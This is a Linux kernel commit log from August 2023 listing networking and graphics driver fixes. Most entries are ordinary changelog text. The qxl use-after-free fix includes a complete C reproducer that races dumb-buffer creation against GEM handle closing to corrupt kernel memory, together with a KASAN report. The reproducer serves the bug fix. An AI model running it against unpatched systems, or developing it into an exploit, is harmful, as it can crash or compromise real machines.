1. 18 Aug, 2023 2 commits
    • Linus Torvalds's avatar
      Merge tag 'net-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/netdev/net · 0e8860d2
      Linus Torvalds authored
      Pull networking fixes from Jakub Kicinski:
       "Including fixes from ipsec and netfilter.
      
        No known outstanding regressions.
      
        Fixes to fixes:
      
         - virtio-net: set queues after driver_ok, avoid a potential race
           added by recent fix
      
         - Revert "vlan: Fix VLAN 0 memory leak", it may lead to a warning
           when VLAN 0 is registered explicitly
      
         - nf_tables:
            - fix false-positive lockdep splat in recent fixes
            - don't fail inserts if duplicate has expired (fix test failures)
            - fix races between garbage collection and netns dismantle
      
        Current release - new code bugs:
      
         - mlx5: Fix mlx5_cmd_update_root_ft() error flow
      
        Previous releases - regressions:
      
         - phy: fix IRQ-based wake-on-lan over hibernate / power off
      
        Previous releases - always broken:
      
         - sock: fix misuse of sk_under_memory_pressure() preventing system
           from exiting global TCP memory pressure if a single cgroup is under
           pressure
      
         - fix the RTO timer retransmitting skb every 1ms if linear option is
           enabled
      
         - af_key: fix sadb_x_filter validation, amment netlink policy
      
         - ipsec: fix slab-use-after-free in decode_session6()
      
         - macb: in ZynqMP resume always configure PS GTR for non-wakeup
           source
      
        Misc:
      
         - netfilter: set default timeout to 3 secs for sctp shutdown send and
           recv state (from 300ms), align with protocol timers"
      
      * tag 'net-6.5-rc7' of git://git.kernel.org/pub/scm/linux/kernel/git/netdev/net: (49 commits)
        ice: Block switchdev mode when ADQ is active and vice versa
        qede: fix firmware halt over suspend and resume
        net: do not allow gso_size to be set to GSO_BY_FRAGS
        sock: Fix misuse of sk_under_memory_pressure()
        sfc: don't fail probe if MAE/TC setup fails
        sfc: don't unregister flow_indr if it was never registered
        net: dsa: mv88e6xxx: Wait for EEPROM done before HW reset
        net/mlx5: Fix mlx5_cmd_update_root_ft() error flow
        net/mlx5e: XDP, Fix fifo overrun on XDP_REDIRECT
        i40e: fix misleading debug logs
        iavf: fix FDIR rule fields masks validation
        ipv6: fix indentation of a config attribute
        mailmap: add entries for Simon Horman
        broadcom: b44: Use b44_writephy() return value
        net: openvswitch: reject negative ifindex
        team: Fix incorrect deletion of ETH_P_8021AD protocol vid from slaves
        net: phy: broadcom: stub c45 read/write for 54810
        netfilter: nft_dynset: disallow object maps
        netfilter: nf_tables: GC transaction race with netns dismantle
        netfilter: nf_tables: fix GC transaction races with netns and netlink event exit path
        ...
      0e8860d2
    • Linus Torvalds's avatar
      Merge tag 'drm-fixes-2023-08-18-1' of git://anongit.freedesktop.org/drm/drm · 1ada9c07
      Linus Torvalds authored
      Pull drm fixes from Dave Airlie:
       "Regular enough week, mostly the usual amdgpu and i915 fixes.  Also
        qaic, nouveau, qxl and a revert for an EDID patch that had some side
        effects, along with a couple of panel fixes.
      
        edid:
         - revert mode parsing fix that had side effects.
      
        i915:
         - Fix the flow for ignoring GuC SLPC efficient frequency selection
         - Fix SDVO panel_type initialization
         - Fix display probe for IVB Q and IVB D GT2 server
      
        nouveau:
         - fix use-after-free in connector code
      
        qaic:
         - integer overflow check fix
         - fix slicing memory leak
      
        panel:
         - fix JDI LT070ME05000 probing
         - fix AUO G121EAN01 timings
      
        amdgpu:
         - SMU 13.x fixes
         - Fix mcbp parameter for gfx9
         - SMU 11.x fixes
         - Temporary fix for large numbers of XCP partitions
         - S0ix fixes
         - DCN 2.0 fix
      
        qxl:
         - fix use after free race in dumb object allocation"
      
      * tag 'drm-fixes-2023-08-18-1' of git://anongit.freedesktop.org/drm/drm:
        drm/qxl: fix UAF on handle creation
        Revert "drm/edid: Fix csync detailed mode parsing"
        drm/nouveau/disp: fix use-after-free in error handling of nouveau_connector_create
        Revert "Revert "drm/amdgpu/display: change pipe policy for DCN 2.0""
        drm/amd: flush any delayed gfxoff on suspend entry
        drm/amdgpu: skip fence GFX interrupts disable/enable for S0ix
        drm/amdgpu: skip xcp drm device allocation when out of drm resource
        drm/amd/pm: Update pci link width for smu v13.0.6
        drm/amd/pm: Fix temperature unit of SMU v13.0.6
        drm/amdgpu/pm: fix throttle_status for other than MP1 11.0.7
        drm/amdgpu: disable mcbp if parameter zero is set
        drm/amd/pm: disallow the fan setting if there is no fan on smu 13.0.0
        accel/qaic: Clean up integer overflow checking in map_user_pages()
        accel/qaic: Fix slicing memory leak
        drm/i915: fix display probe for IVB Q and IVB D GT2 server
        drm/i915/sdvo: fix panel_type initialization
        drm/i915/guc/slpc: Restore efficient freq earlier
        drm/panel: simple: Fix AUO G121EAN01 panel timings according to the docs
        drm/panel: JDI LT070ME05000 simplify with dev_err_probe()
      1ada9c07
  2. 17 Aug, 2023 15 commits
    • Jakub Kicinski's avatar
      Merge branch '40GbE' of git://git.kernel.org/pub/scm/linux/kernel/git/tnguy/net-queue · 820a38d8
      Jakub Kicinski authored
      Tony Nguyen says:
      
      ====================
      Intel Wired LAN Driver Updates 2023-08-16 (iavf, i40e)
      
      This series contains updates to iavf and i40e drivers.
      
      Piotr adds checks for unsupported Flow Director rules on iavf.
      
      Andrii replaces incorrect 'write' messaging on read operations for i40e.
      
      * '40GbE' of git://git.kernel.org/pub/scm/linux/kernel/git/tnguy/net-queue:
        i40e: fix misleading debug logs
        iavf: fix FDIR rule fields masks validation
      ====================
      
      Link: https://lore.kernel.org/r/20230816193308.1307535-1-anthony.l.nguyen@intel.comSigned-off-by: default avatarJakub Kicinski <kuba@kernel.org>
      820a38d8
    • Wander Lairson Costa's avatar
      drm/qxl: fix UAF on handle creation · c611589b
      Wander Lairson Costa authored
      qxl_mode_dumb_create() dereferences the qobj returned by
      qxl_gem_object_create_with_handle(), but the handle is the only one
      holding a reference to it.
      
      A potential attacker could guess the returned handle value and closes it
      between the return of qxl_gem_object_create_with_handle() and the qobj
      usage, triggering a use-after-free scenario.
      
      Reproducer:
      
      int dri_fd =-1;
      struct drm_mode_create_dumb arg = {0};
      
      void gem_close(int handle);
      
      void* trigger(void* ptr)
      {
      	int ret;
      	arg.width = arg.height = 0x20;
      	arg.bpp = 32;
      	ret = ioctl(dri_fd, DRM_IOCTL_MODE_CREATE_DUMB, &arg);
      	if(ret)
      	{
      		perror("[*] DRM_IOCTL_MODE_CREATE_DUMB Failed");
      		exit(-1);
      	}
      	gem_close(arg.handle);
      	while(1) {
      		struct drm_mode_create_dumb args = {0};
      		args.width = args.height = 0x20;
      		args.bpp = 32;
      		ret = ioctl(dri_fd, DRM_IOCTL_MODE_CREATE_DUMB, &args);
      		if (ret) {
      			perror("[*] DRM_IOCTL_MODE_CREATE_DUMB Failed");
      			exit(-1);
      		}
      
      		printf("[*] DRM_IOCTL_MODE_CREATE_DUMB created, %d\n", args.handle);
      		gem_close(args.handle);
      	}
      	return NULL;
      }
      
      void gem_close(int handle)
      {
      	struct drm_gem_close args;
      	args.handle = handle;
      	int ret = ioctl(dri_fd, DRM_IOCTL_GEM_CLOSE, &args); // gem close handle
      	if (!ret)
      		printf("gem close handle %d\n", args.handle);
      }
      
      int main(void)
      {
      	dri_fd= open("/dev/dri/card0", O_RDWR);
      	printf("fd:%d\n", dri_fd);
      
      	if(dri_fd == -1)
      		return -1;
      
      	pthread_t tid1;
      
      	if(pthread_create(&tid1,NULL,trigger,NULL)){
      		perror("[*] thread_create tid1\n");
      		return -1;
      	}
      	while (1)
      	{
      		gem_close(arg.handle);
      	}
      	return 0;
      }
      
      This is a KASAN report:
      
      ==================================================================
      BUG: KASAN: slab-use-after-free in qxl_mode_dumb_create+0x3c2/0x400 linux/drivers/gpu/drm/qxl/qxl_dumb.c:69
      Write of size 1 at addr ffff88801136c240 by task poc/515
      
      CPU: 1 PID: 515 Comm: poc Not tainted 6.3.0 #3
      Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-debian-1.16.0-4 04/01/2014
      Call Trace:
      <TASK>
      __dump_stack linux/lib/dump_stack.c:88
      dump_stack_lvl+0x48/0x70 linux/lib/dump_stack.c:106
      print_address_description linux/mm/kasan/report.c:319
      print_report+0xd2/0x660 linux/mm/kasan/report.c:430
      kasan_report+0xd2/0x110 linux/mm/kasan/report.c:536
      __asan_report_store1_noabort+0x17/0x30 linux/mm/kasan/report_generic.c:383
      qxl_mode_dumb_create+0x3c2/0x400 linux/drivers/gpu/drm/qxl/qxl_dumb.c:69
      drm_mode_create_dumb linux/drivers/gpu/drm/drm_dumb_buffers.c:96
      drm_mode_create_dumb_ioctl+0x1f5/0x2d0 linux/drivers/gpu/drm/drm_dumb_buffers.c:102
      drm_ioctl_kernel+0x21d/0x430 linux/drivers/gpu/drm/drm_ioctl.c:788
      drm_ioctl+0x56f/0xcc0 linux/drivers/gpu/drm/drm_ioctl.c:891
      vfs_ioctl linux/fs/ioctl.c:51
      __do_sys_ioctl linux/fs/ioctl.c:870
      __se_sys_ioctl linux/fs/ioctl.c:856
      __x64_sys_ioctl+0x13d/0x1c0 linux/fs/ioctl.c:856
      do_syscall_x64 linux/arch/x86/entry/common.c:50
      do_syscall_64+0x5b/0x90 linux/arch/x86/entry/common.c:80
      entry_SYSCALL_64_after_hwframe+0x72/0xdc linux/arch/x86/entry/entry_64.S:120
      RIP: 0033:0x7ff5004ff5f7
      Code: 00 00 00 48 8b 05 99 c8 0d 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 69 c8 0d 00 f7 d8 64 89 01 48
      
      RSP: 002b:00007ff500408ea8 EFLAGS: 00000286 ORIG_RAX: 0000000000000010
      RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007ff5004ff5f7
      RDX: 00007ff500408ec0 RSI: 00000000c02064b2 RDI: 0000000000000003
      RBP: 00007ff500408ef0 R08: 0000000000000000 R09: 000000000000002a
      R10: 0000000000000000 R11: 0000000000000286 R12: 00007fff1c6cdafe
      R13: 00007fff1c6cdaff R14: 00007ff500408fc0 R15: 0000000000802000
      </TASK>
      
      Allocated by task 515:
      kasan_save_stack+0x38/0x70 linux/mm/kasan/common.c:45
      kasan_set_track+0x25/0x40 linux/mm/kasan/common.c:52
      kasan_save_alloc_info+0x1e/0x40 linux/mm/kasan/generic.c:510
      ____kasan_kmalloc linux/mm/kasan/common.c:374
      __kasan_kmalloc+0xc3/0xd0 linux/mm/kasan/common.c:383
      kasan_kmalloc linux/./include/linux/kasan.h:196
      kmalloc_trace+0x48/0xc0 linux/mm/slab_common.c:1066
      kmalloc linux/./include/linux/slab.h:580
      kzalloc linux/./include/linux/slab.h:720
      qxl_bo_create+0x11a/0x610 linux/drivers/gpu/drm/qxl/qxl_object.c:124
      qxl_gem_object_create+0xd9/0x360 linux/drivers/gpu/drm/qxl/qxl_gem.c:58
      qxl_gem_object_create_with_handle+0xa1/0x180 linux/drivers/gpu/drm/qxl/qxl_gem.c:89
      qxl_mode_dumb_create+0x1cd/0x400 linux/drivers/gpu/drm/qxl/qxl_dumb.c:63
      drm_mode_create_dumb linux/drivers/gpu/drm/drm_dumb_buffers.c:96
      drm_mode_create_dumb_ioctl+0x1f5/0x2d0 linux/drivers/gpu/drm/drm_dumb_buffers.c:102
      drm_ioctl_kernel+0x21d/0x430 linux/drivers/gpu/drm/drm_ioctl.c:788
      drm_ioctl+0x56f/0xcc0 linux/drivers/gpu/drm/drm_ioctl.c:891
      vfs_ioctl linux/fs/ioctl.c:51
      __do_sys_ioctl linux/fs/ioctl.c:870
      __se_sys_ioctl linux/fs/ioctl.c:856
      __x64_sys_ioctl+0x13d/0x1c0 linux/fs/ioctl.c:856
      do_syscall_x64 linux/arch/x86/entry/common.c:50
      do_syscall_64+0x5b/0x90 linux/arch/x86/entry/common.c:80
      entry_SYSCALL_64_after_hwframe+0x72/0xdc linux/arch/x86/entry/entry_64.S:120
      
      Freed by task 515:
      kasan_save_stack+0x38/0x70 linux/mm/kasan/common.c:45
      kasan_set_track+0x25/0x40 linux/mm/kasan/common.c:52
      kasan_save_free_info+0x2e/0x60 linux/mm/kasan/generic.c:521
      ____kasan_slab_free linux/mm/kasan/common.c:236
      ____kasan_slab_free+0x180/0x1f0 linux/mm/kasan/common.c:200
      __kasan_slab_free+0x12/0x30 linux/mm/kasan/common.c:244
      kasan_slab_free linux/./include/linux/kasan.h:162
      slab_free_hook linux/mm/slub.c:1781
      slab_free_freelist_hook+0xd2/0x1a0 linux/mm/slub.c:1807
      slab_free linux/mm/slub.c:3787
      __kmem_cache_free+0x196/0x2d0 linux/mm/slub.c:3800
      kfree+0x78/0x120 linux/mm/slab_common.c:1019
      qxl_ttm_bo_destroy+0x140/0x1a0 linux/drivers/gpu/drm/qxl/qxl_object.c:49
      ttm_bo_release+0x678/0xa30 linux/drivers/gpu/drm/ttm/ttm_bo.c:381
      kref_put linux/./include/linux/kref.h:65
      ttm_bo_put+0x50/0x80 linux/drivers/gpu/drm/ttm/ttm_bo.c:393
      qxl_gem_object_free+0x3e/0x60 linux/drivers/gpu/drm/qxl/qxl_gem.c:42
      drm_gem_object_free+0x5c/0x90 linux/drivers/gpu/drm/drm_gem.c:974
      kref_put linux/./include/linux/kref.h:65
      __drm_gem_object_put linux/./include/drm/drm_gem.h:431
      drm_gem_object_put linux/./include/drm/drm_gem.h:444
      qxl_gem_object_create_with_handle+0x151/0x180 linux/drivers/gpu/drm/qxl/qxl_gem.c:100
      qxl_mode_dumb_create+0x1cd/0x400 linux/drivers/gpu/drm/qxl/qxl_dumb.c:63
      drm_mode_create_dumb linux/drivers/gpu/drm/drm_dumb_buffers.c:96
      drm_mode_create_dumb_ioctl+0x1f5/0x2d0 linux/drivers/gpu/drm/drm_dumb_buffers.c:102
      drm_ioctl_kernel+0x21d/0x430 linux/drivers/gpu/drm/drm_ioctl.c:788
      drm_ioctl+0x56f/0xcc0 linux/drivers/gpu/drm/drm_ioctl.c:891
      vfs_ioctl linux/fs/ioctl.c:51
      __do_sys_ioctl linux/fs/ioctl.c:870
      __se_sys_ioctl linux/fs/ioctl.c:856
      __x64_sys_ioctl+0x13d/0x1c0 linux/fs/ioctl.c:856
      do_syscall_x64 linux/arch/x86/entry/common.c:50
      do_syscall_64+0x5b/0x90 linux/arch/x86/entry/common.c:80
      entry_SYSCALL_64_after_hwframe+0x72/0xdc linux/arch/x86/entry/entry_64.S:120
      
      The buggy address belongs to the object at ffff88801136c000
      which belongs to the cache kmalloc-1k of size 1024
      The buggy address is located 576 bytes inside of
      freed 1024-byte region [ffff88801136c000, ffff88801136c400)
      
      The buggy address belongs to the physical page:
      page:0000000089fc329b refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x11368
      head:0000000089fc329b order:3 entire_mapcount:0 nr_pages_mapped:0 pincount:0
      flags: 0xfffffc0010200(slab|head|node=0|zone=1|lastcpupid=0x1fffff)
      raw: 000fffffc0010200 ffff888007841dc0 dead000000000122 0000000000000000
      raw: 0000000000000000 0000000080100010 00000001ffffffff 0000000000000000
      page dumped because: kasan: bad access detected
      
      Memory state around the buggy address:
      ffff88801136c100: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
      ffff88801136c180: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
      >ffff88801136c200: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
      ^
      ffff88801136c280: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
      ffff88801136c300: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
      ==================================================================
      Disabling lock debugging due to kernel taint
      
      Instead of returning a weak reference to the qxl_bo object, return the
      created drm_gem_object and let the caller decrement the reference count
      when it no longer needs it. As a convenience, if the caller is not
      interested in the gobj object, it can pass NULL to the parameter and the
      reference counting is descremented internally.
      
      The bug and the reproducer were originally found by the Zero Day Initiative project (ZDI-CAN-20940).
      
      Link: https://www.zerodayinitiative.com/Signed-off-by: default avatarWander Lairson Costa <wander@redhat.com>
      Cc: stable@vger.kernel.org
      Reviewed-by: default avatarDave Airlie <airlied@redhat.com>
      Signed-off-by: default avatarDave Airlie <airlied@redhat.com>
      Link: https://patchwork.freedesktop.org/patch/msgid/20230814165119.90847-1-wander@redhat.com
      c611589b
    • Dave Airlie's avatar
      Merge tag 'amd-drm-fixes-6.5-2023-08-16' of... · 68c60b34
      Dave Airlie authored
      Merge tag 'amd-drm-fixes-6.5-2023-08-16' of https://gitlab.freedesktop.org/agd5f/linux into drm-fixes
      
      amd-drm-fixes-6.5-2023-08-16:
      
      amdgpu:
      - SMU 13.x fixes
      - Fix mcbp parameter for gfx9
      - SMU 11.x fixes
      - Temporary fix for large numbers of XCP partitions
      - S0ix fixes
      - DCN 2.0 fix
      Signed-off-by: default avatarDave Airlie <airlied@redhat.com>
      
      From: Alex Deucher <alexander.deucher@amd.com>
      Link: https://patchwork.freedesktop.org/patch/msgid/20230816200226.10771-1-alexander.deucher@amd.com
      68c60b34
    • Dave Airlie's avatar
      Merge tag 'drm-misc-fixes-2023-08-17' of git://anongit.freedesktop.org/drm/drm-misc into drm-fixes · be48306f
      Dave Airlie authored
      One EPROBE_DEFER handling fix for the JDI LT070ME05000, a timing fix for
      the AUO G121EAN01 panel, an integer overflow and a memory leak fixes for
      the qaic accel, a use-after-free fix for nouveau and a revert for an
      alleged fix in EDID parsing.
      Signed-off-by: default avatarDave Airlie <airlied@redhat.com>
      
      From: Maxime Ripard <mripard@redhat.com>
      Link: https://patchwork.freedesktop.org/patch/msgid/3olqt33em5uhxzjbqghwcwnvmw73h7bxkbdxookmnkecymd4vc@7ogm6gewpprq
      be48306f
    • Dave Airlie's avatar
      Merge tag 'drm-intel-fixes-2023-08-17' of... · dd64d8ae
      Dave Airlie authored
      Merge tag 'drm-intel-fixes-2023-08-17' of git://anongit.freedesktop.org/drm/drm-intel into drm-fixes
      
      - Fix the flow for ignoring GuC SLPC efficient frequency selection (Vinay)
      - Fix SDVO panel_type initialization (Jani)
      - Fix display probe for IVB Q and IVB D GT2 server (Jani)
      Signed-off-by: default avatarDave Airlie <airlied@redhat.com>
      
      From: Rodrigo Vivi <rodrigo.vivi@intel.com>
      Link: https://patchwork.freedesktop.org/patch/msgid/ZN4yduyBU1Ev9dc7@intel.com
      dd64d8ae
    • Jakub Kicinski's avatar
      Merge tag 'mlx5-fixes-2023-08-16' of git://git.kernel.org/pub/scm/linux/kernel/git/saeed/linux · e9bbd601
      Jakub Kicinski authored
      Saeed Mahameed says:
      
      ====================
      mlx5 fixes 2023-08-16
      
      This series provides bug fixes to mlx5 driver.
      
      * tag 'mlx5-fixes-2023-08-16' of git://git.kernel.org/pub/scm/linux/kernel/git/saeed/linux:
        net/mlx5: Fix mlx5_cmd_update_root_ft() error flow
        net/mlx5e: XDP, Fix fifo overrun on XDP_REDIRECT
      ====================
      
      Link: https://lore.kernel.org/r/20230816204108.53819-1-saeed@kernel.orgSigned-off-by: default avatarJakub Kicinski <kuba@kernel.org>
      e9bbd601
    • Marcin Szycik's avatar
      ice: Block switchdev mode when ADQ is active and vice versa · 43d00e10
      Marcin Szycik authored
      ADQ and switchdev are not supported simultaneously. Enabling both at the
      same time can result in nullptr dereference.
      
      To prevent this, check if ADQ is active when changing devlink mode to
      switchdev mode, and check if switchdev is active when enabling ADQ.
      
      Fixes: fbc7b27a ("ice: enable ndo_setup_tc support for mqprio_qdisc")
      Signed-off-by: default avatarMarcin Szycik <marcin.szycik@linux.intel.com>
      Reviewed-by: default avatarPrzemek Kitszel <przemyslaw.kitszel@intel.com>
      Tested-by: default avatarSujai Buvaneswaran <sujai.buvaneswaran@intel.com>
      Signed-off-by: default avatarTony Nguyen <anthony.l.nguyen@intel.com>
      Reviewed-by: default avatarSimon Horman <horms@kernel.org>
      Link: https://lore.kernel.org/r/20230816193405.1307580-1-anthony.l.nguyen@intel.comSigned-off-by: default avatarJakub Kicinski <kuba@kernel.org>
      43d00e10
    • Manish Chopra's avatar
      qede: fix firmware halt over suspend and resume · 2eb9625a
      Manish Chopra authored
      While performing certain power-off sequences, PCI drivers are
      called to suspend and resume their underlying devices through
      PCI PM (power management) interface. However this NIC hardware
      does not support PCI PM suspend/resume operations so system wide
      suspend/resume leads to bad MFW (management firmware) state which
      causes various follow-up errors in driver when communicating with
      the device/firmware afterwards.
      
      To fix this driver implements PCI PM suspend handler to indicate
      unsupported operation to the PCI subsystem explicitly, thus avoiding
      system to go into suspended/standby mode.
      
      Without this fix device/firmware does not recover unless system
      is power cycled.
      
      Fixes: 2950219d ("qede: Add basic network device support")
      Signed-off-by: default avatarManish Chopra <manishc@marvell.com>
      Signed-off-by: default avatarAlok Prasad <palok@marvell.com>
      Reviewed-by: default avatarJohn Meneghini <jmeneghi@redhat.com>
      Reviewed-by: default avatarSimon Horman <horms@kernel.org>
      Link: https://lore.kernel.org/r/20230816150711.59035-1-manishc@marvell.comSigned-off-by: default avatarJakub Kicinski <kuba@kernel.org>
      2eb9625a
    • Eric Dumazet's avatar
      net: do not allow gso_size to be set to GSO_BY_FRAGS · b616be6b
      Eric Dumazet authored
      One missing check in virtio_net_hdr_to_skb() allowed
      syzbot to crash kernels again [1]
      
      Do not allow gso_size to be set to GSO_BY_FRAGS (0xffff),
      because this magic value is used by the kernel.
      
      [1]
      general protection fault, probably for non-canonical address 0xdffffc000000000e: 0000 [#1] PREEMPT SMP KASAN
      KASAN: null-ptr-deref in range [0x0000000000000070-0x0000000000000077]
      CPU: 0 PID: 5039 Comm: syz-executor401 Not tainted 6.5.0-rc5-next-20230809-syzkaller #0
      Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/26/2023
      RIP: 0010:skb_segment+0x1a52/0x3ef0 net/core/skbuff.c:4500
      Code: 00 00 00 e9 ab eb ff ff e8 6b 96 5d f9 48 8b 84 24 00 01 00 00 48 8d 78 70 48 b8 00 00 00 00 00 fc ff df 48 89 fa 48 c1 ea 03 <0f> b6 04 02 84 c0 74 08 3c 03 0f 8e ea 21 00 00 48 8b 84 24 00 01
      RSP: 0018:ffffc90003d3f1c8 EFLAGS: 00010202
      RAX: dffffc0000000000 RBX: 000000000001fffe RCX: 0000000000000000
      RDX: 000000000000000e RSI: ffffffff882a3115 RDI: 0000000000000070
      RBP: ffffc90003d3f378 R08: 0000000000000005 R09: 000000000000ffff
      R10: 000000000000ffff R11: 5ee4a93e456187d6 R12: 000000000001ffc6
      R13: dffffc0000000000 R14: 0000000000000008 R15: 000000000000ffff
      FS: 00005555563f2380(0000) GS:ffff8880b9800000(0000) knlGS:0000000000000000
      CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
      CR2: 0000000020020000 CR3: 000000001626d000 CR4: 00000000003506f0
      DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
      DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
      Call Trace:
      <TASK>
      udp6_ufo_fragment+0x9d2/0xd50 net/ipv6/udp_offload.c:109
      ipv6_gso_segment+0x5c4/0x17b0 net/ipv6/ip6_offload.c:120
      skb_mac_gso_segment+0x292/0x610 net/core/gso.c:53
      __skb_gso_segment+0x339/0x710 net/core/gso.c:124
      skb_gso_segment include/net/gso.h:83 [inline]
      validate_xmit_skb+0x3a5/0xf10 net/core/dev.c:3625
      __dev_queue_xmit+0x8f0/0x3d60 net/core/dev.c:4329
      dev_queue_xmit include/linux/netdevice.h:3082 [inline]
      packet_xmit+0x257/0x380 net/packet/af_packet.c:276
      packet_snd net/packet/af_packet.c:3087 [inline]
      packet_sendmsg+0x24c7/0x5570 net/packet/af_packet.c:3119
      sock_sendmsg_nosec net/socket.c:727 [inline]
      sock_sendmsg+0xd9/0x180 net/socket.c:750
      ____sys_sendmsg+0x6ac/0x940 net/socket.c:2496
      ___sys_sendmsg+0x135/0x1d0 net/socket.c:2550
      __sys_sendmsg+0x117/0x1e0 net/socket.c:2579
      do_syscall_x64 arch/x86/entry/common.c:50 [inline]
      do_syscall_64+0x38/0xb0 arch/x86/entry/common.c:80
      entry_SYSCALL_64_after_hwframe+0x63/0xcd
      RIP: 0033:0x7ff27cdb34d9
      
      Fixes: 3953c46c ("sk_buff: allow segmenting based on frag sizes")
      Reported-by: default avatarsyzbot <syzkaller@googlegroups.com>
      Signed-off-by: default avatarEric Dumazet <edumazet@google.com>
      Cc: Xin Long <lucien.xin@gmail.com>
      Cc: "Michael S. Tsirkin" <mst@redhat.com>
      Cc: Jason Wang <jasowang@redhat.com>
      Reviewed-by: default avatarWillem de Bruijn <willemb@google.com>
      Reviewed-by: default avatarMarcelo Ricardo Leitner <marcelo.leitner@gmail.com>
      Reviewed-by: default avatarXuan Zhuo <xuanzhuo@linux.alibaba.com>
      Link: https://lore.kernel.org/r/20230816142158.1779798-1-edumazet@google.comSigned-off-by: default avatarJakub Kicinski <kuba@kernel.org>
      b616be6b
    • Abel Wu's avatar
      sock: Fix misuse of sk_under_memory_pressure() · 2d0c88e8
      Abel Wu authored
      The status of global socket memory pressure is updated when:
      
        a) __sk_mem_raise_allocated():
      
      	enter: sk_memory_allocated(sk) >  sysctl_mem[1]
      	leave: sk_memory_allocated(sk) <= sysctl_mem[0]
      
        b) __sk_mem_reduce_allocated():
      
      	leave: sk_under_memory_pressure(sk) &&
      		sk_memory_allocated(sk) < sysctl_mem[0]
      
      So the conditions of leaving global pressure are inconstant, which
      may lead to the situation that one pressured net-memcg prevents the
      global pressure from being cleared when there is indeed no global
      pressure, thus the global constrains are still in effect unexpectedly
      on the other sockets.
      
      This patch fixes this by ignoring the net-memcg's pressure when
      deciding whether should leave global memory pressure.
      
      Fixes: e1aab161 ("socket: initial cgroup code.")
      Signed-off-by: default avatarAbel Wu <wuyun.abel@bytedance.com>
      Acked-by: default avatarShakeel Butt <shakeelb@google.com>
      Link: https://lore.kernel.org/r/20230816091226.1542-1-wuyun.abel@bytedance.comSigned-off-by: default avatarJakub Kicinski <kuba@kernel.org>
      2d0c88e8
    • Edward Cree's avatar
      sfc: don't fail probe if MAE/TC setup fails · 54c9016e
      Edward Cree authored
      Existing comment in the source explains why we don't want efx_init_tc()
       failure to be fatal.  Cited commit erroneously consolidated failure
       paths causing the probe to be failed in this case.
      
      Fixes: 7e056e23 ("sfc: obtain device mac address based on firmware handle for ef100")
      Reviewed-by: default avatarMartin Habets <habetsm.xilinx@gmail.com>
      Signed-off-by: default avatarEdward Cree <ecree.xilinx@gmail.com>
      Link: https://lore.kernel.org/r/aa7f589dd6028bd1ad49f0a85f37ab33c09b2b45.1692114888.git.ecree.xilinx@gmail.comSigned-off-by: default avatarJakub Kicinski <kuba@kernel.org>
      54c9016e
    • Edward Cree's avatar
      sfc: don't unregister flow_indr if it was never registered · fa165e19
      Edward Cree authored
      In efx_init_tc(), move the setting of efx->tc->up after the
       flow_indr_dev_register() call, so that if it fails, efx_fini_tc()
       won't call flow_indr_dev_unregister().
      
      Fixes: 5b2e12d5 ("sfc: bind indirect blocks for TC offload on EF100")
      Suggested-by: default avatarPieter Jansen van Vuuren <pieter.jansen-van-vuuren@amd.com>
      Reviewed-by: default avatarMartin Habets <habetsm.xilinx@gmail.com>
      Signed-off-by: default avatarEdward Cree <ecree.xilinx@gmail.com>
      Link: https://lore.kernel.org/r/a81284d7013aba74005277bd81104e4cfbea3f6f.1692114888.git.ecree.xilinx@gmail.comSigned-off-by: default avatarJakub Kicinski <kuba@kernel.org>
      fa165e19
    • Linus Torvalds's avatar
      Merge tag 'nfsd-6.5-4' of git://git.kernel.org/pub/scm/linux/kernel/git/cel/linux · 16931859
      Linus Torvalds authored
      Pull nfsd fix from Chuck Lever:
      
       - Fix new MSG_SPLICE_PAGES support in server's TCP sendmsg helper
      
      * tag 'nfsd-6.5-4' of git://git.kernel.org/pub/scm/linux/kernel/git/cel/linux:
        sunrpc: set the bv_offset of first bvec in svc_tcp_sendmsg
      16931859
    • Jani Nikula's avatar
      Revert "drm/edid: Fix csync detailed mode parsing" · 50b6f2c8
      Jani Nikula authored
      This reverts commit ca62297b.
      
      Commit ca62297b ("drm/edid: Fix csync detailed mode parsing") fixed
      EDID detailed mode sync parsing. Unfortunately, there are quite a few
      displays out there that have bogus (zero) sync field that are broken by
      the change. Zero means analog composite sync, which is not right for
      digital displays, and the modes get rejected. Regardless, it used to
      work, and it needs to continue to work. Revert the change.
      
      Rejecting modes with analog composite sync was the part that fixed the
      gitlab issue 8146 [1]. We'll need to get back to the drawing board with
      that.
      
      [1] https://gitlab.freedesktop.org/drm/intel/-/issues/8146
      
      Closes: https://gitlab.freedesktop.org/drm/intel/-/issues/8789
      Closes: https://gitlab.freedesktop.org/drm/intel/-/issues/8930
      Closes: https://gitlab.freedesktop.org/drm/intel/-/issues/9044
      Fixes: ca62297b ("drm/edid: Fix csync detailed mode parsing")
      Cc: Ville Syrjälä <ville.syrjala@linux.intel.com>
      Cc: dri-devel@lists.freedesktop.org
      Cc: <stable@vger.kernel.org> # v6.4+
      Signed-off-by: default avatarJani Nikula <jani.nikula@intel.com>
      Acked-by: default avatarVille Syrjälä <ville.syrjala@linux.intel.com>
      Link: https://patchwork.freedesktop.org/patch/msgid/20230815101907.2900768-1-jani.nikula@intel.com
      50b6f2c8
    • Alfred Lee's avatar
      net: dsa: mv88e6xxx: Wait for EEPROM done before HW reset · 23d775f1
      Alfred Lee authored
      If the switch is reset during active EEPROM transactions, as in
      just after an SoC reset after power up, the I2C bus transaction
      may be cut short leaving the EEPROM internal I2C state machine
      in the wrong state.  When the switch is reset again, the bad
      state machine state may result in data being read from the wrong
      memory location causing the switch to enter unexpected mode
      rendering it inoperational.
      
      Fixes: a3dcb3e7 ("net: dsa: mv88e6xxx: Wait for EEPROM done after HW reset")
      Signed-off-by: default avatarAlfred Lee <l00g33k@gmail.com>
